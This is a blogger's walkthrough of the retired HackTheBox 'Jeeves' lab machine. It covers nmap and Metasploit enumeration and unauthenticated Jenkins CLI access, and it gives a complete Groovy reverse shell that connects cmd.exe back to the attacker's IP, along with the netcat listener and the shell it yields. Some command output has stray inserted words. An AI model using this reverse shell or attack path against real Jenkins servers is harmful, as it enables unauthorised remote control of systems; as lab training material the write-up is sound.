Jeeves – HacktheBox

After getting the email that Jeeves will be retiring soon I thought I’d give it a go. This is the first Windows box that I’ve done in quite a while. Lets get into it

START

A quick nmap scan to see what ports are open. The -F tag is Fast mode – Scan fewer ports than the default scan.

[root:~/Desktop/jeeves]# nmap -F 10.10.10.63
Starting Nmap 7.70SVN ( https://nmap.org ) at 2018-05-17 10:09 BST
Nmap scan report for 10.10.10.63
Host is up, received echo-reply ttl 127 (0.029s latency).
Not shown: 97 filtered ports
Reason: 97 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127

Nmap done: 1 IP address (1 host up) scanned in 2.16 seconds

Looks like a webserver is available and remote desktop. While i do a full port scan I’ll load up Firefox and take a look at the website.

When I use the search it brings be to a page with an error – it looks like it is displaying a picture rather than html or other code

The full port scan completed

Nmap scan report for 10.10.10.63 
Host is up, received echo-reply ttl 127 (0.035s latency).
 
PORT STATE SERVICE REASON VERSION 
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE 
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results: 
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m57s
| smb-security-mode:
| account_used: guest 
| authentication_level: user 
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2018-05-09 02:02:11
|_ start_date: 2018-05-07 03:07:55

Port 50000 has a Jetty Server running. A quick Google reveals “Eclipse Jetty provides a Web server and javax.servlet container, plus support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations. These components are open source and available for commercial use and distribution.” https://www.eclipse.org/jetty/

Checking to see what is on that webserver. Followed by a dirbuster on port 50000.

I browsed to the askjeeves directory and got what looks like a CMS called Jenkins.

A quick Google and it looks like Jenkins is a self-contained Java-based program, ready to run out-of-the-box, with packages for Windows, Mac OS X and other Unix-like operating systems.

I fired up Metasploit to see if it had a Jenkins module and sure enough it did have a few. I tried out one.

msf post(multi/gather/jenkins_gather) > use auxiliary/scanner/http/jenkins_enum
msf auxiliary(scanner/http/jenkins_enum) > show options

Module options (auxiliary/scanner/http/jenkins_enum):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 Proxies no A proxy chain of format type:host:port[,type:host:port][...]
 RHOSTS 10.10.10.63 yes The target address range or CIDR identifier
 RPORT 50000 yes The target port (TCP)
 SSL false no Negotiate SSL/TLS for outgoing connections
 TARGETURI /askjeeves/ yes The path to the Jenkins-CI application
 THREADS 1 yes The number of concurrent threads
 VHOST no HTTP server virtual host

msf auxiliary(scanner/http/jenkins_enum) > run

[+] [2018.05.17-11:02:57] 10.10.10.63:50000 - Jenkins Version 2.87
[+] [2018.05.17-11:02:57] http://10.10.10.63:50000/askjeeves/ - /askjeeves/script does not require authentication (200)
[+] [2018.05.17-11:02:57] http://10.10.10.63:50000/askjeeves/ - /askjeeves/view/All/newJob does not require authentication (200)
[+] [2018.05.17-11:02:57] http://10.10.10.63:50000/askjeeves/ - /askjeeves/asynchPeople/ does not require authentication (200)
[+] [2018.05.17-11:02:57] http://10.10.10.63:50000/askjeeves/ - /askjeeves/systemInfo does not require authentication (200)
[*] [2018.05.17-11:02:57] Getting useful information from systemInfo
 OS: Windows 10
 OS Version: 10.0
 Arch: x86
 User: kohsuke
 Domain: JEEVES
 Home Directory: C:\Users\kohsuke
 Language: en
 Country: US
 Timezone: America/New_York
 Computer Name: JEEVES
 System Drive: C:
 Temp Directory: C:\Users\kohsuke\AppData\Local\Temp
 Temp Directory: C:\Users\kohsuke\AppData\Local\Temp

[*] [2018.05.17-11:02:58] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/jenkins_enum) > 

So it is a Windows 10 box with a user kohsuke and the Jenkins application is v 2.87.

I browsed through the CMS and found a way to execute commands through a jar file I had to download

Looks like it worked

[root:~/Desktop/jeeves]# java -jar jenkins-cli.jar -s http://10.10.10.63:50000/askjeeves/ who-am-i (master✱) 
Authenticated as: anonymous
Authorities:
[root:~/Desktop/jeeves]#

Now what can I run? Noting useful by the looks of it

Available Commands

add-job-to-view Adds jobs to view.
build Builds a job, and optionally waits until its completion.
cancel-quiet-down Cancel the effect of the “quiet-down” command.
clear-queue Clears the build queue.
connect-node Reconnect to a node(s)
console Retrieves console output of a build.
copy-job Copies a job.
create-credentials-by-xml Create Credential by XML
create-credentials-domain-by-xml Create Credentials Domain by XML
create-job Creates a new job by reading stdin as a configuration XML file.
create-node Creates a new node by reading stdin as a XML configuration.
create-view Creates a new view by reading stdin as a XML configuration.
declarative-linter Validate a Jenkinsfile containing a Declarative Pipeline
delete-builds Deletes build record(s).
delete-credentials Delete a Credential
delete-credentials-domain Delete a Credentials Domain
delete-job Deletes job(s).
delete-node Deletes node(s)
delete-view Deletes view(s).
disable-job Disables a job.
disconnect-node Disconnects from a node.
enable-job Enables a job.
get-credentials-as-xml Get a Credentials as XML (secrets redacted)
get-credentials-domain-as-xml Get a Credentials Domain as XML
get-gradle List available gradle installations
get-job Dumps the job definition XML to stdout.
get-node Dumps the node definition XML to stdout.
get-view Dumps the view definition XML to stdout.
groovy Executes the specified Groovy script.
groovysh Runs an interactive groovy shell.
help Lists all the available commands or a detailed description of single command.
install-plugin Installs a plugin either from a file, an URL, or from update center.
install-tool Performs automatic tool installation, and print its location to stdout. Can be only called from inside a build. [deprecated]
keep-build Mark the build to keep the build forever.
list-changes Dumps the changelog for the specified build(s).
list-credentials Lists the Credentials in a specific Store
list-credentials-context-resolvers List Credentials Context Resolvers
list-credentials-providers List Credentials Providers
list-jobs Lists all jobs in a specific view or item group.
list-plugins Outputs a list of installed plugins.
login Saves the current credentials to allow future commands to run without explicit credential information. [deprecated]
logout Deletes the credentials stored with the login command. [deprecated]
mail Reads stdin and sends that out as an e-mail.
offline-node Stop using a node for performing builds temporarily, until the next “online-node” command.
online-node Resume using a node for performing builds, to cancel out the earlier “offline-node” command.
quiet-down Quiet down Jenkins, in preparation for a restart. Don’t start any builds.
reload-configuration Discard all the loaded data in memory and reload everything from file system. Useful when you modified config files directly on disk.
reload-job Reload job(s)
remove-job-from-view Removes jobs from view.
replay-pipeline Replay a Pipeline build with edited script taken from standard input
restart Restart Jenkins.
safe-restart Safely restart Jenkins.
safe-shutdown Puts Jenkins into the quiet mode, wait for existing builds to be completed, and then shut down Jenkins.
session-id Outputs the session ID, which changes every time Jenkins restarts.
set-build-description Sets the description of a build.
set-build-display-name Sets the displayName of a build.
set-build-parameter Update/set the build parameter of the current build in progress. [deprecated]
set-build-result Sets the result of the current build. Works only if invoked from within a build. [deprecated]
shutdown Immediately shuts down Jenkins server.
update-credentials-by-xml Update Credentials by XML
update-credentials-domain-by-xml Update Credentials Domain by XML
update-job Updates the job definition XML from stdin. The opposite of the get-job command.
update-node Updates the node definition XML from stdin. The opposite of the get-node command.
update-view Updates the view definition XML from stdin. The opposite of the get-view command.
version Outputs the current version.
wait-node-offline Wait for a node to become offline.
wait-node-online Wait for a node to become online.
who-am-i Reports your credential and permissions.

I need to upload a reverse shell and run it.

I found this page and a Groovy reverse shell script on https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76 I modified the ip and port and started a netcat listener.

String host="10.10.14.234";
int port=55555;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Bingo!

[root:~/Desktop/jeeves]# nc -nlvp 55555 (master✱) 
listening on [any] 55555 ...
connect to [10.10.14.234] from (UNKNOWN) [10.10.10.63] 49680
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>

Time to capture the user flag

C:\Users\kohsuke\Desktop>dir 
dir 
 Volume in drive C has no label. 
 Volume Serial Number is BE50-B1C9 
 
 Directory of C:\Users\kohsuke\Desktop 
 
11/03/2017 11:19 PM <DIR> . 
11/03/2017 11:19 PM <DIR> .. 
11/03/2017 11:22 PM 32 user.txt 
 1 File(s) 32 bytes 
 2 Dir(s) 7,165,026,304 bytes free 
 
C:\Users\kohsuke\Desktop>type user.txt 
type user.txt 
e3232272596fb47950d59c4cf1e7066a

Now for priv esc. Lets see what OS version is running and look for exploits.

C:\>systeminfo
systeminfo

Host Name: JEEVES
OS Name: Microsoft Windows 10 Pro
OS Version:  Bedlington 10.0.10586 N/A Build 10586
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00331-20304-47406-AA297
Original Install Date: 10/25/2017, 4:45:33 PM
System Boot Time: 5/16/2018, 2:50:22 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC

“Researchers Discovered this Exploit in Microsoft Windows 10 Redstone 1 (August 2016) and specifically Target Microsoft Windows 10 x64 Version 1511 and The build number is Microsoft Windows 10.0.10586.” https://gbhackers.com/nsa-malware-eternalblue-successfully-exploit-and-port-into-microsoft-windows-10/

So I’ve learned that Windows 10 is also vulnerable to Eternal Blue. I tried finding the Windows 10 exploit but couldn’t and the Windows 7 one doesn’t work ( i tried it).

After poking about the server i found a keypass file.

C:\Users\kohsuke\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

Directory of C:\Users\kohsuke\Documents

11/03/2017 11:18 PM <DIR> .
11/03/2017 11:18 PM <DIR> ..
 Kibaha 09/18/2017 01:43 PM 2,846 CEH.kdbx
 1 File(s) 2,846 bytes
 2 Dir(s) 7,032,320,000 bytes free

I could not get it downloaded to my machine. If it was on a Linux but it would be a lot easier but a netcat connection on a Windows box made it impossible ( for me ).

Summary

I didn’t learn much on this box other than to search for files in DOS.

dir fileyouwant.whatever /s /p

Disappointed that I was unable to figure out how to transfer the file to my box. Please add a comment on how you would have done it.

FIN

rowbot

Share

Leave a Reply

Your email address will not be published. Required fields are marked *

Post comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.